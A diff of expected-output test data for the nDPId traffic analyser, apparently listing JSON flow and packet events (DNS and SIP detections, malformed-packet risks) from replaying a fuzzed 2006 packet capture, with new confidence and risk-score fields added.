-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-ad?r.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-ad?r.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"ts_msec":1120470456152,"pkt":"AODtAW69ADBUADRWCABFAABbAABACEARtz7AqAEBwKgBAgA1CuIARyNx4+eAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1120470456286,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01092{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1120470456286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"ts_msec":1120470456286,"pkt":"AODtAW69ADBUADRWCABFAAIBAABAADcRiizU8iEjwKgBAiVzAMQB7c3hU0lQJXMAMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA3NiBSRUdJU1RFUg0KRnJvbTogPHNpcDp2b2kxODA2MkBzaXAuY3liZXJjaXR5LmRrPjN0YWc9M2JmZmNjYw0KVG86IDxzaXA6dm9pMTgwNjJAc2lwLmN5+GVyY2l0cS5kaz47dGFnPTAwLTA0MDkwLTE3MDFiNjUxLTE1YzIzOGNlNg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZUNlaXNlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5aEc0YktucDYyOTEzNjY1LTQzMGFhMmRhMTkyLjE2OC4xLjINCldXVy0lcwBoZW50aWNhtWU6IERpZ2VzdFNyZWFsbT0ic2lwLmN5YmVyYyVzAEFkayIsbm9uY2VUIjE3MDFiNjM5MTQ4MDVjZDIxMzk1MzZjMDAzMjNkNTgiLG9wYXF1ZT0iMTcwMWExMzUxYjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aCVzAEQ1DQpDb250ZW50LUxlbmd0aDogMA0KDQo="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1120470456513,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470456513,"pkt":"ADBUADRWAODtAW69CABFAABIa1sAAIARS\/bAqAECwKgDAQrjADU0NPT5NOgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470457512,"flow_last_seen":1120470457512,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470457512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1120470457512,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470457512,"pkt":"ADBUADRWAODtAW69CABFAABIa1wAAIARS\/XAqAECwKgBAQrjADUANPT5NOgBAAABAAAAAAAABFtzaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470457512,"flow_last_seen":1120470457512,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470457512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470457512,"flow_last_seen":1120470457512,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470457512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1120470459516,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470459516,"pkt":"ADBUAjRWAODtAW69CABFAABIa10AAIARS\/TAqAECwKgBAQrjADUANPT5NOgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1120470461518,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470461518,"pkt":"ADBUADRWAODtAW69CABFAABIa14AAFMRS\/PAqAECwKgBAQrjADUANPT5NOgBAAABAAAAAAAABF9zaXAEX3VkcAPDaXAJa3liZXJtaXR5AmRrAAAhAAE="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470457512,"flow_last_seen":1120470461518,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470461518,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.?ip.kybermity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":427,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470457512,"flow_last_seen":1120470461518,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470461518,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.?ip.kybermity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":427,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470457512,"flow_last_seen":1120470465524,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470465524,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2787,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1120470473526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470473526,"pkt":"ADBUADRWAODtAW69CABFAABEa2AAAIARS\/XAqAECwKgBAQrkADUAMLnxaukAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"ts_msec":1120470473527,"pkt":"AODtAW69ADBUADRWCABFAABbAABAJXMAtz7AqAEBwKgBAgA1CuQAR5xtaumAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3Qw"}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":431,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2157,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470473631,"pkt":"ADBUADRWACVzVG69CG1FAABIa2IAAIARS+\/AqAECwKgBAQrlADUANLH1d+oBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
@@ -933,56 +935,56 @@
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":432,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":498}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1120470474627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470474627,"pkt":"ADBUADRWAODtAW69CABFAABIa2MAAIARS+7AqAECwKgBAQrlADUANLH1d+oBgAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1120470476630,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470476630,"pkt":"ADBUADRWAODtAW69CABFAABIa2QAAIARS+3AqAECwKgBAQrlADUANLH1d+oBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrJXMAAAE="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470474627,"flow_last_seen":1120470476630,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470476630,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00874{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470474627,"flow_last_seen":1120470476630,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470476630,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1120470478633,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470478633,"pkt":"ADBUADRWAODtAW69CABFAABIa2UAAIARS+zAqAECwKgBAQrlADUANLH1d+oBAAABAAAAAAAABF9zaXAEX3VkcJpzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
